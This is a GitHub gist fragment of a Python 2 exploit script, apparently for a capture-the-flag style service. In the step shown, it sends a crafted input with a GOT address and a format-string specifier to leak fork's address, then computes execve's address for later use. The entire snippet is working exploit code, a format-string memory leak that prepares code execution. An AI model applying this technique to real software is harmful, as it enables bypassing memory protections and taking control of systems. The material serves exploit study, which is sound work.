Instantly share code, notes, and snippets.

Embed
What would you like to do?
# Step 1c--- Get the address of execve
LEAKFORKADDR = dword_to_bitstring(location_got_fork)
LEAKFORKADDR += "%22$s:ENFORK:"
nc.read_until("Your choice: ")
nc.write("1" + "\n")
nc.read_until("Insert name: ")
nc.write(LEAKFORKADDR+"A"*(100-len(LEAKFORKADDR))+"\x01\x01"*4+"\xFF\xFF"+"\n")
nc.read_until("Uranium in nuclear plant \"")
addrfork = bitstring_to_dword(nc.read_until(":ENFORK:")[4:-8])
addrexecve = addrfork + 0x320
print "[+] Address of fork :", hex(addrfork)
print " > Address of execve :", hex(addrexecve)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment